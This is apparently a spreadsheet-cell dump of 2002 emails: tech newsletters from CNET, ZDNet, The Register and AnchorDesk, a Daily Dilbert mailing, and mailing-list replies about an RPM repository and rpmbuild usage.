    <t>![]([URL]http://home.cnet.com[/URL]  \n|  \n  \n|  ![](/b.gif)  \n  **Search**  \n  \n  News.com All CNET     The Web  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n|  | ![News.context]([URL]http://home.cnet.com[/URL]  \n| July 18, 2002  \n  \n---|---  \n  \n![]([URL]http://news.cnet.com[/URL]**Adios to options\nexcess?**\n\n**If the nation's politicians expect Silicon Valley to fall in line on the\nissue of expensing stock options, they're living in a fantasy world.**\n\nFlipping through my Rolodex this past week, I couldn't find one solitary\ntechnology type willing to support even the mildest proposal to change how\ncorporations account for stock options. The more common response was a verbal\n"middle finger" shouted in the general direction of Washington.\n\nNo surprises, there. The options argument is not just about putting food on\nthe table--make that _a lot_ of food, in some cases--but about the way the\ncomputer industry views itself. Tech companies believe they belong in a\ndifferent category, say, from the likes of Coca Cola, Washington Post Co. and\nBank One Corp.--all which recently decided to begin expensing stock options.\n\nTech titans also served notice they will remember to support friends--and shun\nfoes--in Washington next November. An empty threat? Perhaps, but consider\nthis: in the last national election, the computer industry contributed more\nthan $40 million (52 percent to Democrats, 46 percent to Republicans.) That\nwas good for a seventh place ranking, according to the Center for Responsive\nPolitics.\n\nCharlie Cooper, Executive Editor/Commentary  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n**Why the options party is over**  \nTransamerica Investment Management portfolio manager **Kenneth Broad** says\nit's easy to see why the tech industry is fighting so hard to keep options\nfrom being expensed: no one likes to lose a free lunch.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]\n\n**We can handle CEO cheats**  \nThe Bush administration has crafted its own proposals for dealing with excess\nand dishonesty in corporate life. Commerce Undersecretary **Phil Bond** , who\nspoke with CNET News.com, believes the President's plan is just the ticket to\nget executives to come clean.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]\n\n**Why free downloads help, not hurt**  \nRecording artist **Janis Ian** throws down the gauntlet to the National\nAcademy of Recording Arts &amp; Sciences (home of the Grammy Awards) and the\nRecording Industry Association of America. Making the case for the salutary\nbenefits of free digital downloads, she says the music industry is dancing to\nthe wrong beat.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]\n\n  \n**A CTO's worst nightmare**  \nAfter the Sept. 11 terrorist attacks, anxious investors worried when the stock\nmarket's largest financial exchange would open again. New York Stock Exchange\nCTO **Roger Burkhardt** was on the job faster than a trader can say "buy."  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]\n\n**Fact and fiction in the Web services debate**  \nSun versus Microsoft, Java versus .Net, McNealy versus Gates. Does it all\nreally matter, Iona Technologies CEO **Barry Morris** asks, when it comes down\nto what users want. The future of Web services, Morris says, is being held\nhostage amid a fruitless debate over industry politics.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]\n\n**Rewiring the FBI for the 21st century**  \nWhen it comes to the digital age, the FBI is stuck with tools left over from\nthe old days. That's why the FBI is hoping for big things from its new CIO.\n**Darwin John** tells CNET News.com about his plans for revitalizing the\nBureau's dated IT infrastructure. But this long-time outsider must first learn\nto navigate his way through the bureau's treacherous bureaucracy.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] |  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]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zdnet@example.com  \nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.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32&amp;ISSUE=2002-07-18)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://news.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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dilbert@example.com\nFrom: Daily Dilbert &lt;2.20880.71-S6_ngjncfBFy.1@ummail4.unitedmedia.com&gt;\nDate: Thu, 18 Jul 2002 06:49:42 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 06:49:42 -0400 (EDT)</t>
  </si>
  <si>
    <t>Daily Dilbert &lt;2.20880.71-S6_ngjncfBFy.1@ummail4.unitedmedia.com&gt;</t>
  </si>
  <si>
    <t>Your Daily Dilbert 07/18/2002</t>
  </si>
  <si>
    <t>--16675500.1026989382816.JavaMail.root.umsan1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit E-mail error You're subscribed to the HTML version of the Daily Dilbert, which shows the comic strip as a graphic, but your mail system either can't support HTML or is set up to remove HTML content. For more information, contact your Internet service provider or mail system administrator. To change to a plain text subscription, modify your account preferences at  [URL]http://www.dilbert.com[/URL] The plain text option appears toward the bottom of the modification page. --16675500.1026989382816.JavaMail.root.umsan1 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Daily Dilbert =09=09 =09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=0907/18/2002 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09&lt;= IMG SRC=3D"[URL]http://www.comics.com[/URL]" WIDTH= =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt; =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09Hi Justin, enjoy your daily comic from Dilbert.com.If you like the Daily Dil= bert, tell a friend! Click here to send mail= =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09= Complete your collection while pretending to work! &gt; Shop =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09They're character-shaped, in colle= ctible tins.&gt; Shop&lt;= /TD&gt; =09=09=09=09=09 =09=09=09=09=09Get any Dilbert strip publ= ished in the last 90 days printed on aT-shirt, sweatshirt or poster. Se= lected older strips are also available. &gt; Shop =09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09View all pro= ducts =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09 Modify Your Account/UnsubscribeB= uy This StripÂ Â Â Send This=  Strip to a FriendÂ Â Â Month of Dilbert&amp;nb= sp;Â  =09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09Unsubscribe | = Modify Your Subscription | Request a New=  Subscription | Report S= ubscription Problems Subscribe to the Dilbert Newsletter/Join Dog= bert's New Ruling Class | Dilbert on Your Site/Intranet | Advertising Info | Dilbert in Your Publication =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09 =09=09 =09=09 =09=09=09 =09=09 =09=09=09 =09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09=09 =09=09=09=09=09 =09=09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09=09 =09=09 =09 --16675500.1026989382816.JavaMail.root.umsan1--</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: ZDNet Tech Update Today &lt;Online#3.20467.ac-q5A1l6tzmmPhUdRR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 03:08:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 03:08:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>ZDNet Tech Update Today &lt;Online#3.20467.ac-q5A1l6tzmmPhUdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>When search results don't count (Tech Update)</t>
  </si>
  <si>
    <t>\n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]\n|  | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |  | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]  \n\n![]([URL]http://www.zdnet.com[/URL]  \n\nVITAL SIGNS FOR JULY 18, 2002  \n\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://image.com.com[/URL]  \n---  \n**Dan Farber**  \n**Gaga for Google? When results don't count**  \nWhen my Web search on a leading IT exec came up almost empty, what was I to\nthink? As it turns out, the lack of Web tracks is not necessarily a sign of\nirrelevance.  \n![]([URL]http://www.zdnet.com[/URL] **And it offers a lesson\nor two**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Latest from ZDNet News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Unisys servers shape up\nfor Itanium 2  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Linux to enter\nsupercomputing top five  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] U.S. wants your mailman\nto snoop on you  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Motorola: Gloomier\noutlook for handsets  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Yahoo Mail swaps out\nJavaScript words  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] TI boosts Sun's\nUltraSparc chip  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] PC slump drives AMD\ndeeper into the red  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] **More Enterprise News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n**David's Picks**  \n|  ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n\nDavid  \nBerlind\n\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Group proposes PC protection guarantees**  \nSeveral **U.S. government** agencies have teamed with an international\nInternet security organization to support a set of benchmarks aimed at\nguaranteeing a **minimum security standard** for computers. While **Windows\n2000** workstations are the first benchmark that the disparate organizations\nhave agreed upon, others to follow include **Cisco IOS** for routers, Solaris,\nLinux and HP-UX. Reaching agreement on these benchmarks will not be a walk in\nthe park.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**  \n![]([URL]http://www.zdnet.com[/URL] **Microsoft squashes\nWindows 2000 bugs**\n\n![]([URL]http://techupdate.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**As the rhetoric turns**  \nLast year, **Steve Ballmer** called the GPL on which Linux is based a "\n**cancer**." This year, **Linux is a "unique competititor**." The emergence of\nLinux as a serious competitor to Windows has forced Microsoft to change the\nway it approaches customers, Microsoft's CEO acknowledged at this week's\nFusion 2002. Microsoft traditionally has played its **"low price, high\nvolume"** game against IBM, Oracle and others. Now it must figure out how to\nbeat Linux, which has an even lower cost -- free.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**\n\n**Wi-Fi can wait**  \nThe next iteration of Wi-Fi (aka **802.11a** ) may be getting a lot of\ninterest, but rolling it out now, says **Gartner** , would be jumping the gun.\nThe anointed successor to the **802.11b** modulation scheme provides up to\nfive times the throughput over its predecessor. When will it be ready for\nprime time?  \n![]([URL]http://www.zdnet.com[/URL] **Find out why you\nshould wait**  \n![]([URL]http://www.zdnet.com[/URL] **'Rainbow' coalition to\nspread wireless**\n\n**More large-scale worm attacks? Brace yourself**  \nIt's been a year since the **Code Red** worm wreaked havoc on the Net. What's\nchanged? Internet worms have become **much more robust** since Code Red. And\nthat doesn't bode well, since antivirus software hasn't kept up with all the\nchanges. So far in 2002, we've been lucky. **Robert Vamosi** tells you how to\nprepare for future threats.  \n![]([URL]http://www.zdnet.com[/URL] **Here's what he\nrecommends**\n\n**Macworld hears roar of Jaguar**  \nAt this week's Macworld, Apple CEO **Steve Jobs** heralded the early arrival\n(August 24) of **Mac OS X version 10.2** (code-named Jaguar), which features\nimproved search features plus **QuickTime 6** with support for MPEG-4. Also:\nAn iPod for Windows, a 17-inch flat-panel iMac, new charges for iTools Web\nservices and a leg-up for Mac Office.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full report**  \n![]([URL]http://www.zdnet.com[/URL] **What David Coursey\nwants from Macworld**\n\n![]([URL]http://www.zdnet.com[/URL] me at\n**david.berlind@cnet.com**  \n  \n![]([URL]http://www.zdnet.com[/URL]**Back to top**  \n  \n  \n  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |  \n  \n**Also on Tech Update Today**  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n**COMMENTARY**  \n![]([URL]http://www.zdnet.com[/URL] |  **Fact and fiction in the Web services\ndebate**  \nIona Technologies CEO **Barry Morris** says the battle between .Net and Java\nisn't important. Web services' future is held hostage by an unresolved debate\nover **industry standards**.  \n  \n  \n---|---  \n**DOWNLOADS**  \n![]([URL]http://www.zdnet.com[/URL] |  **Gather Net information**  \nConduct Ping, Traceroute, Finger, and Whois queries, as well as gather\nextensive IP information with this handy kit of **network tools**.  \n  \n  \n---|---  \n**PREVIOUSLY ON TECH UPDATE TODAY**  \n![]([URL]http://www.zdnet.com[/URL] |  **Software contracts: Clause for alarm**  \nBe wary of fine print. Learn to spot **red flags** in corporate software\ncontracts before you sign on the dotted line.  \n  \n  \n---|---  \n![]([URL]http://www.zdnet.com[/URL]**Crucial Clicks\n--products worth looking at**  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n| **MONITORS**  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | **A Porsche\nyou can afford**  \nSamsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P,\na sleek, 17-inch LCD.  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL] review  \n![]([URL]http://www.zdnet.com[/URL] |  |\n![]([URL]http://www.zdnet.com[/URL] Popular\nProducts  \n---  \n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Monitors**  \n![]([URL]http://www.zdnet.com[/URL]  \n**1**. Samsung SyncMaster 151S  \n![]([URL]http://www.zdnet.com[/URL]  \n**2**. NEC MultiSync 1550V  \n![]([URL]http://www.zdnet.com[/URL]  \n**3**. Envision EN-5100e  \n![]([URL]http://www.zdnet.com[/URL]  \n**4**. Samsung SyncMaster 570 V  \n![]([URL]http://www.zdnet.com[/URL]  \n**5**. Samsung SyncMaster 955 DF  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://techupdate.zdnet.com[/URL]**More popular\nmonitors**  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n  \n**Elsewhere on ZDNet**  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n  \n**Need a memory upgrade? Find out with CNET's Memory Configurator.\n\nClearance Center: Get discounts on PCs, PDAs, MP3 players and more!\n\nFind out the top 10 Web services security requirements at Tech Update.\n\nBuilder.com shows you how to bring Java to the masses with Cold Fusion MX.\n\nCheck out thousands of IT job listings in ZDNet's Career Center. **  \n  \n  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] | ![]([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ontact us | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a\nregistered service mark of CNET Networks, Inc.**\n\n|\n\n![]([URL]http://gserv.zdnet.com[/URL]  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://www.zdnet.com http://image.com.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Reg Subscribers &lt;update@list.theregister.co.uk&gt;\nFrom: update@list.theregister.co.uk\nDate: Thu, 18 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 03:00:01 +0100</t>
  </si>
  <si>
    <t>Reg Headlines Thursday July 18</t>
  </si>
  <si>
    <t>Today's Headlines from The Register\n-----------------------------------\n\n    To unsubscribe from this daily news update, see the instructions at\n    the end of this message.\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Software\n\n    Sun's Java-Liberty moves risk industry scuffles\n    It's a trust thing\n        [URL]http://www.theregister.co.uk[/URL]\n\n    MS white paper says Palladium open, clean, not DRM\n    Quite plausibly, too. They're really trying very hard here...\n        [URL]http://www.theregister.co.uk[/URL]\n\nSemiconductors\n\n    Itanic OEM slams Itanic\n    Never mind our servers, it's b*ll*cks\n        [URL]http://www.theregister.co.uk[/URL]\n\nInternet\n\n    Apple joins in 'end of free Internet' bandwagon\n    Cough up or else\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Team demos 'first quantum crypto prototype machine'\n    The secret comes out of the lab\n        [URL]http://www.theregister.co.uk[/URL]\n\n    BT suspends techie over Angus Deayton phone tap claim\n    Man arrested\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Energis shareholders are revolting\n    Create Web site to 'fight for small investor'\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Domain Registry of Europe defends tactics, sues Tucows\n    Says it says here, not a bill\n        [URL]http://www.theregister.co.uk[/URL]\n\n    MS to charge for MSN 8 browser - msn.co.uk for chop?\n    Seems to be losing interest in the things MSN UK does\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Oftel rejects BT break-up call\n    Reckons it can handle BT\n        [URL]http://www.theregister.co.uk[/URL]\n\nNet Security\n\n    'Hacker' security biz built on FBI snitches\n    Gweeds gets L0pht/@Stake's number\n\n\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Team demos 'first quantum crypto prototype machine'\n    The secret comes out of the lab\n        [URL]http://www.theregister.co.uk[/URL]\n\n    NetIQ claims detects Hacktivismo tool\n    Spoilsports?\n        [URL]http://www.theregister.co.uk[/URL]\n\nBusiness\n\n    HP confirms 150 suspended in email porn probe\n    Disciplinary process\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Apple earnings fall but meet forecasts \n    Whatever\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Europe extends employment rules to teleworkers\n    Three year transition period\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Energis reborn as 'Chelys,' but still called Energis\n    Bankers move in\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Motorola chalks up biggest ever loss, but returns to profit\n    It's the way you tell them...\n        [URL]http://www.theregister.co.uk[/URL]\n\nThe Mac Channel\n\n    Mac drought fails to lift Street, spirits\n    Widescreen iMac, iPod... er, that's it\n        [URL]http://www.theregister.co.uk[/URL]\n\nBootnotes\n\n    Vulture Central welcomes new hatchling\n    Bouncing baby boy joins nest\n        [URL]http://www.theregister.co.uk[/URL]\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The Register and its contents are copyright 2002 Situation Publishing.\nAll rights reserved.\n\n    Tel:     +44 (0)20 7499 2264.\n    Fax:     +44 (0)20 7493 5922.\n    E-Mail:  press.releases@theregister.co.uk\n\nTo unsubscribe from these daily updates, visit the following URL.  Make\nsure that you enter exactly the same e-mail address as you used to join\nthis service.\n\n    [URL]http://list.theregister.co.uk[/URL]</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: AnchorDesk &lt;Online#3.20455.d5-U1ENl7S3adjcY9RR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 02:05:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 02:05:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>AnchorDesk &lt;Online#3.20455.d5-U1ENl7S3adjcY9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \n![AnchorDesk Weekly]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |  |\n![]([URL]http://www.zdnet.com[/URL]  \n|  ![]([URL]http://www.zdnet.com[/URL]  \nTHURSDAY, JULY 18, 2002  \n![]([URL]http://www.zdnet.com[/URL]  \n|\n![]([URL]http://www.zdnet.com[/URL]\n|  ![David\nCoursey]([URL]http://www.zdnet.com[/URL]  \n---  \n  \n**Why we're changing our publishing schedule**  \n  \nDear Reader,\n\nAs of Monday, July 15, AnchorDesk is being published on Mondays, Wednesdays,\nand Fridays, instead of five days a week. The AnchorDesk Weekly newsletter\nwill continued to be published every Friday\n\nWhy are we doing this? There are several reasons, but the most important one\nis giving me a chance do more than just sit behind a desk typing all day in\norder to meet deadlines. I've been writing five columns a week for 18 months\nnow, and I'd be lying to you if I didn't admit to being more than a little\ntired.\n\nAlso, I've been on such a short leash that I haven't been able to travel or\nmeet as many people as I'd like. This new schedule means I'll have more time\nto get out, learn more, see more products, and discover new issues or trends.\nSo it should result in a more interesting and useful AnchorDesk for you.\n\nHaving additional time also means I will be able to work on several projects\nI've been assigned, including one that could bear fruit at the Consumer\nElectronics Show next January. More about that soon, once all the details are\nnailed down.\n\nFor now, the new schedule is being called a "test," which means it could turn\nout to be temporary--or maybe not. We'll run it through the end of the summer\nand see how it works.\n\nI appreciate your continued support of AnchorDesk. While the column will be\nless frequent, I will still be on CNET Radio every weekday at noon PT (or on-\ndemand streaming anytime) and hope you will join me there.\n\nSincerely,\n\nDavid Coursey  \nExecutive Editor  \nAnchorDesk\n\n  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL]  \n| ![]([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areers | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.zdnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a\nregistered service mark of CNET Networks, Inc.**\n\n|\n\n![]([URL]http://gserv.zdnet.com[/URL]  \n  \n---|---  \n  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 15 Aug 2002 23:15:45 +0200</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 23:15:45 +0200</t>
  </si>
  <si>
    <t>Re: apt.freshrpms.net</t>
  </si>
  <si>
    <t>Once upon a time, Joshua wrote : &gt; Does anyone know how often the apt.freshrpms.net repository is  &gt; updated? Is it rsync'ed? It's quite a bit out of date right now. For a &gt; BIND update released mid-July, for example, it has: This is very strange... the Red Hat mirror update is run at least 3 or 4 times a week, I'll look into it right now. Thanks for reporting this! Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 15 Aug 2002 23:08:19 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 23:08:19 -0400 (EDT)</t>
  </si>
  <si>
    <t>Re: Food bits</t>
  </si>
  <si>
    <t>On Thu, 15 Aug 2002, Adam L. Beberg wrote:\n\n--]You are what you eat :)\n\nThus we are what Alton Brown tells us we are.\n\nFood Heat BROWN\n\nall praises and braises.\n\n-tom\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 15 Aug 2002 23:04:24 +0200</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 23:04:24 +0200</t>
  </si>
  <si>
    <t>Re: making rpms from already-compiled source trees</t>
  </si>
  <si>
    <t>Once upon a time, Ralf wrote : &gt; Skipping all RPM build parts except for the actual packing is not &gt; possible Actually it is (sort of). To answer partly the original question, this might have been useful once the %files error was corrected : rpmbuild -bi --short-circuit  This will skip all the way to the %install and start from there. Of course, you need to have already done everything else before, and this will _not_ produce any rpm files, but will at least tell you if everything is now able to finish successfully. Sure, it's not perfect since if the %files error was actually because entries were missing you'll notice it only once the package is really installed. But for multiple typos in the %files section (like when you're writing a spec file after 2AM ;-)) it can come in handy :-) It's also very useful if you need to override some Makefile variables during install, when the simple cases like "%makeinstall" or "make install DESTDIR=%{buildroot}" don't work. It keeps you from redoing all the unpacking and building processes. Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Ralf Ertzinger &lt;ralf@camperquake.de&gt;\nDate: Thu, 15 Aug 2002 20:52:33 +0200</t>
  </si>
  <si>
    <t>Thu, 15 Aug 2002 20:52:33 +0200</t>
  </si>
  <si>
    <t>Re: Documentation about built-in RPM macros?</t>
  </si>
  <si>
